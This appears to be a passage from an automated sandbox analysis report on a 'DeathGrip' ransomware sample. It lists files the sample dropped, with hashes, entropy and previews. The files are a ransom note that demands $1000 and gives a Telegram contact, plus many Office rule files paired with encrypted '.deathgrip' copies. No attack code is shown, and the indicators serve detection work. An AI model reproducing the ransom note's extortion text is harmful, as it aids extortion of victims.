                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Microsoft\GameDVR\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100071v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100071v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.444210531375938
                                                          Encrypted:false
                                                          SSDEEP:24:zqlOsvtfmayiqOZW3ojeIY4Q8RD8g+RjPl1NC:zqAsvtZfqOs37hERD8gaT4
                                                          MD5:BB5BB804F8C6C61FCF72D190FAFAFA70
                                                          SHA1:9B511402D9F23B06D91F11CD7E17F504F9B9E286
                                                          SHA-256:134EB802CF1029D0C3AF6D96AE38596BC32917AD0C94CDDF32DD7428AF59329C
                                                          SHA-512:A295B6620A589CE5B2BBD8703D818FB2AFF3FBED662D598F618B65F92EFED96195C737818D52D6550924E9AEBDF702DC5B6C5787153B5D83CB0164F25BA5A356
                                                          Malicious:false
                                                          Preview:..........U.,..<..I.......M.t..X.$..*....O..a.h....q>.M..,Q...}.T...[l.k...)............._.2\l...`h..m1.m'.....V]......rfR.$..$U>...4,>>e.<.\..I....H~.J.~.$Z$D1.@.(x..S..^"......:7.b.sI..z..!....A......1....>..c_......]%....8...6..~..wvj..C.MI.. 19.<zt..K....p....^..z@b..f.d.....W...p.Y*..$#U....6..~..E...a...u.X.n..'}.1k[:..eF.....z.C..'..k...k.-.".=.....#}&N[,<..1.YWf.n.....I......e.....b/.%,...(.L....L...DIDA27bhdD7oxOp46gYNQvBDwdsvm562Bu5qjjVkw42FrFgf4ymWwxq6BhGWn+6ugtREWe0vj9nzKdB/4rrop4QrYVbZQkqtlUmKGJSDLpXkVGb+C3jNmTn/WbWonDw6r2luc2mWKBjAsv00p8veCi4cAnRbUCtKhn6OkImQu3U3OJrO3u0Z809dNvhAy3cZln/c/8qdfiEvWFblIp6Im3NolC3ZlOK1Inu8U+LDMRhEmXM92Nn30BPeq/yBaYPwU4cl+yOH6u8bPE+v2I0rlLanu3EG6zFRYwoqu3JNK5ogPA0Wuqaz8u3V5F3LVu2qR4HkMw9PHOmxXN2JLTV2JA==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100074v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100074v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.486842971884627
                                                          Encrypted:false
                                                          SSDEEP:24:ql1sNGNQEawy9Lij8wjzUjT+GUEtuX+nY52b/DcEvboZ6uFxuL:yykNQEawy9Lr5UEIRA7pvM3uL
                                                          MD5:2E1C420DA557FE0F7193B5FB68A7A413
                                                          SHA1:B4F504A3738D1EB8D36A6ED8E4782AF56D5F2E25
                                                          SHA-256:ECD3D664E1B0D71A9A52CD2E0740790EFC0FC836A7114166C98511468BD27C1F
                                                          SHA-512:D12ABD8979BBA0286FA76343078E852BD28AF8027743B19D7B9F8FCB11BD0876458608169099DD2C7CF182CC27FA43BDEA0FA18F8D7D8C99062C67D59C401641
                                                          Malicious:false
                                                          Preview:..........DZn.s.;L/..E...../7..._./..pl.=.a.S:.5.......1..x\fjy7...'`.".:.M.!..R.*7 5."{.=\...T8.C..h..Z`W.:...j...|..yN.U.....d.........._WC.......T..Q.j.i5D...w.5.y..".whjE@9d|.<..cun.'.....G_.&....u_..nz...[.0JC......9..r..RuK9..V..e._@Y.o...",..9$!.....E.%f.o.......W.......s...4....Z.......!.#P....-+..2j.Y&.PYi.+......o|"..].y..NR.......?5....*.....}.m...j....Q.T[Be....w......M.z6QV>.H....Gw..........S|..iM..A.....ft.&..B-...........}.AJ.O..+.#{..w..............-......$...F.M...N..%.FT3lpzLF8FYYttD4uAoHfvDkkZyaMV9Nrf63i8Yl9MtWY+nWfYJJV3KFwuRKpeYMFn3oKNKJITimRuAFDY9ar+te1bw/fvCQzGT7FJynrhMEt/HNUKDOjf8yFeEvQXfANdo1XDxBKLpg/a6/udeNSVvbL5AEmt+kLiMDByu+Dh2WpxyBXxSO8bsay4a8FQt4gAU0I3ZEfAx6yrp+nfsqRi4vfivg9fqZJ2qDAvgvX7xmAlBbjE8jV0Qm7L+OXKMRfpSo1KGJfgBEfb1t9xRV//B4elU/2b0yOUHgLfbkObPW+6Q3oYNTNPv0sJ2BPcxPnHzCTt5xicvoSgOk19Ec9g==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100075v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100075v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):944
                                                          Entropy (8bit):7.538588311610406
                                                          Encrypted:false
                                                          SSDEEP:24:ZT+xZvpnQkS2ZAws0AFyFhkef9o+0X0Rcd1G5g:4ZvhlS2ywFkyTkSKVvd1wg
                                                          MD5:A7C1B9B7EC571BDF9FA22EC17B81C917
                                                          SHA1:AACB4B4365724B60444701204362BEEA327FA6A7
                                                          SHA-256:4BED39275FC35E85CD58AB5844CCB14832DE26B6DC97F400ADD017F77537CFB9
                                                          SHA-512:6DF88A616A88E9FE85E2A9CDDD0621816A6CFE4C2DA1C6ED183CEB8E7959F175CE34FC1CC13BA3609E55C55EBE2979A52D671179A19676BD4A195584DFD0C218
                                                          Malicious:false
                                                          Preview:.........'.....Fb...8....|.K.\n}."y.#t..s....`K&.y.7.....#.y.[.......YiN.mJ..K.6.m...!.w..{{.(.b.)sq..;q[.....H.o.Aszs..|L.r..)..e.P...Z..!..}.i$g.z.........v..r.q...rSm...V./O....#6.JU...Hr.2..h..d.d.B.._..Vzg|.X3...u....tI.Q....g..{P...-b..zQ.....D..B.;a<R.}....1@...er..p y...d..b.A..Jz.W..!...uL.;=...K..D.LY..h.......L.^.....+..a..U.~...(..3....\.........t......M...f.<-..z....q..;..R..g&.a.).?..y..eE.....;&...s.0.y...%Z.t..B.9.i*.......z..+..S....J.....#)|.n)6yg...1.-. .Z.........i..'.aL^..U.L....u...V..}*;.1@.Y....u..La.4p.....k.#X}J.....*dd..\.^......Yf......Ol1RsT8ZOZqPHF6ejK2LMuWuseJqRxtoauqisijmgzj0QSnshxMSRZz6vBHUUBbBexXJhpKDzAtoRsV/ED0z+aSF5SNVH3FaeVgF652ncBXKruAQs98ynGAVCyg2RgdWl8Svr3QQWlflIysmzPfMmAKZ+pEuDN5pbEncKWryA7WsCFUh1uJTPbDNsQ5e0Bd+vwf/hnTXQsuCEEi+4pi/+XD+pQrZS+fmn+lpGvUbIvukeXIY+UMw/z0f0yhcqMVlJTk/MbpOJXxB20xp+qpWsUlgslTpmP8tYxWEoCoP1gLiyjoZFrP5PJ1R5DXjHyrVnKNnaMI+Pz4WGASHpwmOtQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100076v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100076v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.388332138726002
                                                          Encrypted:false
                                                          SSDEEP:12:d0uzkPeIjR0Jy2HMbjzVwsPiFjeOufvppAWyLDKfRyZb78HunwssVY/ds/Vw:d0PBjR0Q2HqzVweiFjeO2pkDB4Ontsdw
                                                          MD5:AFBF1CCBA47B28A97A40F4280A80A999
                                                          SHA1:F182CC57025425F7CE17A90A3DC346A6297EC94C
                                                          SHA-256:0AB5D15A077D059BB26E0D1896EE13ED9FDF10E2F5761BC4311F59FEA7A2465C
                                                          SHA-512:D6F6F4E5A6345724929AB73CCC13FE978E5ADB6D729945535AE179355ADDC74494A16F46529DECF08B0EC9829B5795E384586385F1B482A200ED1E1C3F11F928
                                                          Malicious:false
                                                          Preview:............9..5.# ..$.G....."..7..X~....R..}.!N....3r..vJb..b....'...t..6.^#....f....G..../.@.......h......*X..C..=~...F.<.C.#.&>z`.]..71..@......&.^.8..QA1.Cc...#3..9.....;.....Ux.......'i..@.3.J.....F...........3.....}..I.Q].?u.G..Mi....b.V.F.F|h.....bL.U.70.:....n.<0/.r4h.....|BB4A....~..A....W..H.;.....v[G/.....{~..-.;W5..S..3.:.t.8q.8.wz.~/....U..p6R}....^..>s..........w..bL..M....f....;....%O...egd3gCaCWzVpCbg5CaQ5sdlVL8IEOI1mM55V14po6H0vMFuqv0/UIn2zP8nDD9RL+L7I1KtEDdvec6uVMB6Rc245c0Zwe1B3e9JnCNUgIBLV/8r34HdSieFa4z/z92CASXGJImLZTzk+9yH1vmeKEIcRqjhAytscmP7UpmX4eHxp+xvq9uEWLKEHmaHl2takuxYxLyKDKtvNVADw3aoBTzQVspRvKVPV+d11z0/FveiUdbD30bUK1D/Tbs2ab1whNqSs/dYd4H0w9vBdQeNijGHf/zYifu8KpZqmgIVeKGC45ksusfcF5kKN8DViWrDL38ACnnR/Rd2ktvmFOAnpXQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100077v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100077v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.498517470159681
                                                          Encrypted:false
                                                          SSDEEP:12:zlonBIbGA52HrEfPKDKafiqR0MJIUzvgdBfgUECUzGiGPETu1bD8Ir8ajldFAY:zlonBIGdHXw+/DFeiGcWbD8Ir/5X
                                                          MD5:FAB14616C587F263791C60EE7E196CFA
                                                          SHA1:0601700F3DC151C5C17FC8693DAC2B3F5180698A
                                                          SHA-256:D485B32ECC8C99CD7A848A8179C2815C59611983B96DCC39CC8D4C8D0F4D55ED
                                                          SHA-512:9EA1AE16A610106A93D7DE847F177B6796DA20AD01D5D5DBB071841D6E66097C78F4BD94A9507C25A3C8A2C531FD8C65A6E84E1945DD06BFDD54380E3870A7C1
                                                          Malicious:false
                                                          Preview:..........W....}~...@\5.@.].M.}..D....yY.S6..,).........(.,.Qr|.!d..~..{.v.gUy.Y....V..`......0...5./....WR......D.....(...y.~=4......U..s.u..z..}..>I.....qXS...&......R..k.d..{.)...w...7.....&msf..f..Mt.f^.....o.(Rv..a.LYW.fP:|....Rpa,.*.E.R......%Kp+oU.6.I.{..\5..<.1$."b_.....".snN`T...;.$..<..`.....9'.]_.z..Z.4.&......L ..WPw..;r.DV..r......3...1>QW.\m.Q...j..>..b.B.r...=.y.........=...V.p....Z.p.8.00..n...~'r.5F..1.e..[...vf.8(.5.w..C..h..T.1.....F..}S..d..7k.....U7....1.AZcrI22vK1SIlpNHmcR0Ydn4QG6ucBWVq4nBoHtUe2DkZzVE4b8LMBVEuOyrO3sSMM/LoG0lgenwbZxczCqHeSGda/QpdLW8U8Amw6jl2aRdcFusPr+dHmmrG69OWOENKCPfTsD0x9O93e/XsFlJHVTITAwaI1wxQibOVINaDy6TgI/VRnAc9dpSr1csqXjdGdlQqKzIFfIvyrbmemDQ6iN3YsuuFxqaCOzHHaFVoMFxmAMwbpLyzkBzCCTIMFR5giYJCWgXy9Yxz0CzlNbtVHXhlmSmazKkjV2pJNvWeeDAZd0GaphbcJodzmvd6vIcLANXXoPJTXYcQ5JRQhM5MQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100078v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100078v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.415515636036232
                                                          Encrypted:false
                                                          SSDEEP:12:WkNSnO7mb6y1DGtDrAImJV3eIE/Mc6co6FPjR+SEGDeczqxGHwOWzYs2lgoXFBR6:WkonOZ0+ANFEJ6cNhwSEFowtz3LoX3Jq
                                                          MD5:154AA1C4D9D99C5E8AB58997B553E292
                                                          SHA1:562039ADD4E72C8C6F72637B7B620428D48EA4FB
                                                          SHA-256:8A54845031F040F5F5673D98430EA2FA889002EE354FFC20C7E07321646F9944
                                                          SHA-512:9840509C2C38FD08BA915A8EFF26609E2AB45675C3F1BADD2D43AB82CCEFAE97B212CA362023ABF8509553D885C6A7A173E467B3A1496D03A87002CCDEF7B297
                                                          Malicious:false
                                                          Preview:.............r.L.:...;$.u....V...}.%!..s...@_....S....,..7tD..N..V.....\.c.8F...7|.7.C.........ei.|L....a@. %...~..+........U..T.`.f.k..?G.}....../q.......L5...P..k...i.c ......f....t..9.._J.GG..*<.._..y.R...l!..s.D....aQ......\D.3...s.r..8Ej.~C.B.$.N.........8.. \...s..[fObc..P.6.g..C..en]p.Ju.C.{B..#+.y.y...:.....9u\..%..|H.4/.V,...........-...f..D.hLa....$...."[..'+6qXg.T...1.............x...Z.[.AMnNkEZAYc+Gn4LQcBAWehKW51EBVtfCeQYgcnhfpShlKiQrcDPb0OVtbpzoazgcdzbffbTvpS7aU057E8gJGJ+/SW0oifHtUHY1qH3EuH4UNdw67iXjDPEnbYAEGNN84qWTiGGgZrJqYO7d24e8MvCrqNSBpzD+FuA1U9Mf/vr9cBVfpkNqU0DeufjfXZc12spABEy3v2Z50Z+d2Fj7OUajJjqLZabAWsU2Nk4pik3lVa5j59KYtTFAxZsJIFWmtUqNkuPGzWZ7IKety/9ktmpxQEi+gxKnhZAE0jEd5Z94yNeRnX//Ltku5RewbU324OgCQoBJwgOPrKToo4aksQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100079v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100079v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.412732578345053
                                                          Encrypted:false
                                                          SSDEEP:12:Al9Xrng4Rb2T1brJ8PioD70h+ZMqBSwL1xYC2pL44NLS6B3yp9tZq:Avbh9/7is6TB3uZq
                                                          MD5:CC7594541A6F8E7A885603B7CCE0F32E
                                                          SHA1:00DF36E806C970BA1B730BD07E821A29B1F8ACF9
                                                          SHA-256:93A07EC3C1DF45368DD8DE4985E58645C084F3DED5AD80EC21C51B75B39F31A4
                                                          SHA-512:8A067D9A1485CEF20069FEFA30B48F895EC3F643E315DE3EDD251AA1B8AC2A4E77F8A7C2B5C50A7FF4FB19517BCB33414FE137429B5462815B6F098D548A4B68
                                                          Malicious:false
                                                          Preview:.........H..w.'.2.1.......y.Na...m:.rx./~.5C..DJz..:e0...e.........@.>.)~.X....f..m{......?Vg...7....mo......{./..vm.W.0s.9.J8Z.I.k._.Z7..`yM..A..=.......yZ..rV.......[.4..K...4.so......XC.-..;~ qR. ...0$o.SF....GF...U.d....r..?.9&.*..).PG..........B/Q.q .....?.B..i...b..:V|b.`.l-....RN,..."l<..M....g.....y)........ie.....}...5..z...B@.........F..Q*.SnZ.t{Q.....A.+uT..-4&..t<.*..y... t..p(4...1W.R.....ITCsbP5q7Pw+mlBmrAlXRoGVXl4PjjQG+v+HbEvF4xyV7GA6jaRVMCkixv6q8pT9GDFInE+/O6CUI6jgi2wjh+2ccQb/oNPTDNW7HQXeyklGbZtjo+lLKlF8lBZwARHf++zRDOWa1bJAy1XiLPaBzF9VJ+PbUwEXusr7aFGHslwtP2NbB3BVrIQ09EFL9XY4RRJvKgKXCMDhCzv9RyO8T0As6DHtxwTl/pzsxCnLp4F6KHGXv5tvyzoeiCAfJOxU/Gh13+lB8c5XrExzn/IPxlKetJlYvnxFUpPyul2eAYQ8YrDq0wr82pkX3pencFOITwtRW3D3ybde5gue7SIsYA==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100083v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100083v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1040
                                                          Entropy (8bit):7.631896348211253
                                                          Encrypted:false
                                                          SSDEEP:24:ObOEOfUxI9RaLTN6Z5rxRW4VPYgQKOBFLja7Z17DznoFgn:zRfUHLTN6Z3HBYgvsfa73zoOn
                                                          MD5:8B26AB39A94089375E59FFC19935C04F
                                                          SHA1:2C3189B84114A01947DC24E5159AFD68072A61CA
                                                          SHA-256:B8F42929944A3D9EEB8768A0817CD9D1247F19EA898BDA3275059BE2D23694A9
                                                          SHA-512:BFD2B2D33AA4DABCA39410C4016B6037583504B4FC6DF9DCB8BB1BFCF6A155C783CC0ED85A35FE18AD510E5A3862EF1D7E62BAFACA66D58D25B5D8EC65D0B837
                                                          Malicious:false
                                                          Preview:..........U.r6l..".77...yxb...j.(D+....HB..R"..9.[..,.v...L.(..z..pD..3c-....e...[a....bug...u.U..j.....G.r.7..=...C^.J^.g.."...*..XAk.!.F.1K.j.t....{:ui.q!f0B.i..?.T...^..L....>..8....!h.b;.?.)H.....(.B..l..H....[..].3.IP......s..+..H.........Z.yI.X..{(cf.8..[....|..M.....L?.4.....XC.F.d.h.L5k.F.r.mr|lz.z.V........`Ib-Y ....[.F@.H.9.n..p.s`......t]1....E.P2..<..{.t..'...YKT?#.>.&....F6../[}...9nX`.I?v.5...S.K%.....-..X..k....K.10 ....=#t.C.K,.../}.&`....T.{.FG........oL.v68.@k?.Z..F.P.j..z..4.M.`.......[.g...Q..O....X..$.\...mO...>m...Fr2.=@D...C...Z..iVTS.j..\...._B.H.....+~... ..l...Q..n<...k.u'>.8...;~c.^.....I]\3....nu.<U.l.....f..`....i.Z}K:..e..PEbKusNHQboHTiE0neTB2CtECNbMWUO3q9Y9S1jIGqH+ifjg32aL0EkxqGaAeqNZ/GwOeBNsSJ3GKjCEqSEI2GZYUPYvVuF6e75QZPKtT4xec6OwdhPYJlcaJr9KrkuHWbw/spsHVtKNHxeXRaUllpGnDaIPFasaShx/i722GAYtSkcQwqrALVipiincgEMfgvlcQYn0AakpL6zOIhZlib9/TAqxmJayhPS4vOVmysfN7T3r5eFKzJO/tjZuc0+HNQooQXQCe+Jgm1lM0z3HvJqKLeERu4wLhQWpDBM6BVOQh4AS

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100084v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100084v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.320688518039275
                                                          Encrypted:false
                                                          SSDEEP:12:/YYKeOUtCYYs+GR7aH0o9AOCENa1Rtb7iuxYUZX+wMBT6/MtV9NhJL+NOsUaBxjQ:AYK2egRuH0yQRuUZX+wMBIeV9NbWOs/8
                                                          MD5:ED64231E63DD76557E7E4FF4588465A2
                                                          SHA1:10DDB5E202BF0CFAD131ACA088512B8659368546
                                                          SHA-256:933A268916E9E03D5BA1F006A1CB3CA4AA0D1E595A585B7EBAE6575A1B7A34A8
                                                          SHA-512:3F200E2DD8F4CDC91C7D98BEFDE0479226424D9FC341611412EC17BC42DEFC7B6BC4B99F78437ED82B0F59884574E3B39971139F5BA8A4CB30F52AF5CCF09D17
                                                          Malicious:false
                                                          Preview:.........@!.:8...[L.u...2...j...}....+B5d..2.t.T....g...gQ..Q...`yM."..`..>.....$v.8..3N.8%Fq.o./}..2.{.l...^.G.Y,....].Z..U...sQ.5........1.s..3.P...*oT.z.........8.c...v.k.....k$....t.R.j....?..E.aZF.....Ze{Op..:...fF..:.$-..t.i.2.m..`..........e..".`.d.u..O.J.av..u.....a..cf.s..?.y.....F....J.6....7|wGmADO[.q..#......d=*..V..a.[]..#-wG$..X.X]f..7.@.......X.nd.De.wjZ....@r?.....d4..e......j... .tEyL1PNdgDsdenALjCUQp+Bx0xoxf7wtNjcU0kBbO2RUw5wPpda061vgI8BUUH0SxyQgipWi3UNQk7Rkk3Ou1LRw1vlmtrvFXHCC2LZR08T3sJsltsNennugeft1SttvkLcB2LbmSjSPUu9Nr1y87JrMmsgLG4nC4Psxzh0adwb2MmKEnjlLaXn3dOnh6E/sUYu4ttpkdkDneemw3OpKbeedtVnfdYZylgLCiGgFjrrH25bpPI+g5Qcybkj3pFHXGtjoyblelAElIA4yLmPblMhiQSGnI+t9q6voWooZHamBgXBkoehCIKTFRHPi9Im240gH2PQx+p/kicFrOdGIzQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100085v0.xml

                                                          Download File
